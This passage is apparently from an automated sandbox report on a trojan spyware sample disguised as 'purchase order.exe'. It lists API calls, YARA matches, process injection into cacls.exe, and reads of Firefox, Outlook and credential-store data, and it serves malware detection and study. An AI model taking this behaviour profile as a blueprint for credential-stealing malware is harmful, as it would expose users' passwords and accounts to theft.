                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cacls.exe, 00000007.00000003.2549282230.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: cacls.exe, 00000007.00000002.3518525848.00000000046FE000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: purchase order.exe
                Source: C:\Users\user\Desktop\purchase order.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0042CE23 NtClose,3_2_0042CE23
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2B60 NtClose,LdrInitializeThunk,3_2_015A2B60
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_015A2DF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_015A2C70
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A35C0 NtCreateMutant,LdrInitializeThunk,3_2_015A35C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A4340 NtSetContextThread,3_2_015A4340
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A4650 NtSuspendThread,3_2_015A4650
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2BF0 NtAllocateVirtualMemory,3_2_015A2BF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2BE0 NtQueryValueKey,3_2_015A2BE0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2B80 NtQueryInformationFile,3_2_015A2B80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2BA0 NtEnumerateValueKey,3_2_015A2BA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2AD0 NtReadFile,3_2_015A2AD0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2AF0 NtWriteFile,3_2_015A2AF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2AB0 NtWaitForSingleObject,3_2_015A2AB0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2D10 NtMapViewOfSection,3_2_015A2D10
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2D00 NtSetInformationFile,3_2_015A2D00
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2D30 NtUnmapViewOfSection,3_2_015A2D30
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2DD0 NtDelayExecution,3_2_015A2DD0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2DB0 NtEnumerateKey,3_2_015A2DB0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2C60 NtCreateKey,3_2_015A2C60
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2C00 NtQueryInformationProcess,3_2_015A2C00
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2CC0 NtQueryVirtualMemory,3_2_015A2CC0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2CF0 NtOpenProcess,3_2_015A2CF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2CA0 NtQueryInformationToken,3_2_015A2CA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2F60 NtCreateProcessEx,3_2_015A2F60
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2F30 NtCreateSection,3_2_015A2F30
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2FE0 NtCreateFile,3_2_015A2FE0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2F90 NtProtectVirtualMemory,3_2_015A2F90
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2FB0 NtResumeThread,3_2_015A2FB0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2FA0 NtQuerySection,3_2_015A2FA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2E30 NtWriteVirtualMemory,3_2_015A2E30
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2EE0 NtQueueApcThread,3_2_015A2EE0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2E80 NtReadVirtualMemory,3_2_015A2E80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2EA0 NtAdjustPrivilegesToken,3_2_015A2EA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A3010 NtOpenDirectoryObject,3_2_015A3010
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A3090 NtSetValueKey,3_2_015A3090
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A39B0 NtGetContextThread,3_2_015A39B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A3D70 NtOpenThread,3_2_015A3D70
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A3D10 NtOpenProcessToken,3_2_015A3D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03584340 NtSetContextThread,LdrInitializeThunk,7_2_03584340
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03584650 NtSuspendThread,LdrInitializeThunk,7_2_03584650
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582B60 NtClose,LdrInitializeThunk,7_2_03582B60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03582BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03582BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03582BA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582AD0 NtReadFile,LdrInitializeThunk,7_2_03582AD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582AF0 NtWriteFile,LdrInitializeThunk,7_2_03582AF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582F30 NtCreateSection,LdrInitializeThunk,7_2_03582F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582FE0 NtCreateFile,LdrInitializeThunk,7_2_03582FE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582FB0 NtResumeThread,LdrInitializeThunk,7_2_03582FB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03582EE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03582E80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03582D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03582D30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582DD0 NtDelayExecution,LdrInitializeThunk,7_2_03582DD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03582DF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03582C70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582C60 NtCreateKey,LdrInitializeThunk,7_2_03582C60
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03582CA0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_035835C0 NtCreateMutant,LdrInitializeThunk,7_2_035835C0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_035839B0 NtGetContextThread,LdrInitializeThunk,7_2_035839B0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582B80 NtQueryInformationFile,7_2_03582B80
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582AB0 NtWaitForSingleObject,7_2_03582AB0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582F60 NtCreateProcessEx,7_2_03582F60
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582F90 NtProtectVirtualMemory,7_2_03582F90
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582FA0 NtQuerySection,7_2_03582FA0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582E30 NtWriteVirtualMemory,7_2_03582E30
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582EA0 NtAdjustPrivilegesToken,7_2_03582EA0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582D00 NtSetInformationFile,7_2_03582D00
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582DB0 NtEnumerateKey,7_2_03582DB0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582C00 NtQueryInformationProcess,7_2_03582C00
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582CC0 NtQueryVirtualMemory,7_2_03582CC0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03582CF0 NtOpenProcess,7_2_03582CF0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03583010 NtOpenDirectoryObject,7_2_03583010
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03583090 NtSetValueKey,7_2_03583090
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03583D70 NtOpenThread,7_2_03583D70
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_03583D10 NtOpenProcessToken,7_2_03583D10
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CF96D0 NtReadFile,7_2_02CF96D0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CF97D0 NtDeleteFile,7_2_02CF97D0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CF9560 NtCreateFile,7_2_02CF9560
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CF9870 NtClose,7_2_02CF9870
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CF99D0 NtAllocateVirtualMemory,7_2_02CF99D0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_0341F813 NtMapViewOfSection,7_2_0341F813
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_0341F8BA NtUnmapViewOfSection,7_2_0341F8BA
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 035CF290 appears 103 times
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 03585130 appears 58 times
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 03597E54 appears 107 times
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 0353B970 appears 262 times
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 035BEA12 appears 86 times
                Source: C:\Users\user\Desktop\purchase order.exe Code function: String function: 015B7E54 appears 99 times
                Source: C:\Users\user\Desktop\purchase order.exe Code function: String function: 015EF290 appears 103 times
                Source: C:\Users\user\Desktop\purchase order.exe Code function: String function: 015A5130 appears 58 times
                Source: C:\Users\user\Desktop\purchase order.exe Code function: String function: 015DEA12 appears 86 times
                Source: C:\Users\user\Desktop\purchase order.exe Code function: String function: 0155B970 appears 262 times
                Source: purchase order.exe, 00000000.00000002.1854951417.0000000006E10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs purchase order.exe
                Source: purchase order.exe, 00000000.00000000.1656386604.0000000000176000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamepZNub.exe" vs purchase order.exe
                Source: purchase order.exe, 00000000.00000002.1845243448.0000000004CE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs purchase order.exe
                Source: purchase order.exe, 00000000.00000002.1840433341.0000000003549000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs purchase order.exe
                Source: purchase order.exe, 00000000.00000002.1838648327.00000000007CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs purchase order.exe
                Source: purchase order.exe, 00000000.00000002.1839373144.000000000257B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs purchase order.exe
                Source: purchase order.exe, 00000003.00000002.2358800767.00000000010DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCACLS.EXEj% vs purchase order.exe
                Source: purchase order.exe, 00000003.00000002.2358964709.000000000165D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs purchase order.exe
                Source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCACLS.EXEj% vs purchase order.exe
                Source: purchase order.exe Binary or memory string: OriginalFilenamepZNub.exe" vs purchase order.exe
                Source: purchase order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: purchase order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, dc4syRqTeG0pjdnuA8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, dc4syRqTeG0pjdnuA8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@7/7
                Source: C:\Users\user\Desktop\purchase order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order.exe.log
                Source: C:\Users\user\Desktop\purchase order.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exe File created: C:\Users\user\AppData\Local\Temp\t577G2K6
                Source: purchase order.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\purchase order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: cacls.exe, 00000007.00000003.2551557614.0000000003118000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3517170394.0000000003118000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2551438769.00000000030F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: purchase order.exe ReversingLabs: Detection: 34%
                Source: purchase order.exe Virustotal: Detection: 40%
                Source: unknown Process created: C:\Users\user\Desktop\purchase order.exe "C:\Users\user\Desktop\purchase order.exe"
                Source: C:\Users\user\Desktop\purchase order.exe Process created: C:\Users\user\Desktop\purchase order.exe "C:\Users\user\Desktop\purchase order.exe"
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\purchase order.exe Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\cacls.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\purchase order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\purchase order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\cacls.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: purchase order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: purchase order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000002.3517608915.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000002.3517608915.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: olMGHvjsNFhNU.exe, 00000006.00000000.2274072509.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp, olMGHvjsNFhNU.exe, 00000008.00000000.2434347774.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: purchase order.exe, 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2361013060.0000000003365000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2358877344.000000000319E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: purchase order.exe, purchase order.exe, 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000007.00000003.2361013060.0000000003365000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2358877344.000000000319E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, k59NN6noHfaZETvec4.cs .Net Code: DtLHdQbfDH System.Reflection.Assembly.Load(byte[])
                Source: 0.2.purchase order.exe.4ce0000.3.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.purchase order.exe.3617788.0.raw.unpack, k59NN6noHfaZETvec4.cs .Net Code: DtLHdQbfDH System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02355E00 push eax; iretd 0_2_02355E09
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_004148D4 push cs; iretd 3_2_004148D7
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_0042E1F3 push edi; ret 3_2_0042E1FC
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_00419391 push cs; retf 3_2_00419392
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_0040AD51 push ebx; retf 3_2_0040AD54
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_00411D86 push ds; retf 3_2_00411D9F
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_0040ADAF push ebx; retf 3_2_0040AD54
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_004035B0 push eax; ret 3_2_004035B2
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_00404E90 push eax; ret 3_2_00404EA9
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_0153225F pushad ; ret 3_2_015327F9
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_015327FA pushad ; ret 3_2_015327F9
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_015609AD push ecx; mov dword ptr [esp], ecx 3_2_015609B6
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_0153283D push eax; iretd 3_2_01532858
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Code function: 6_2_037BDB72 push FFFFFFECh; iretd 6_2_037BDB8B
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Code function: 6_2_037C0ACF push cs; retf 6_2_037C0AD0
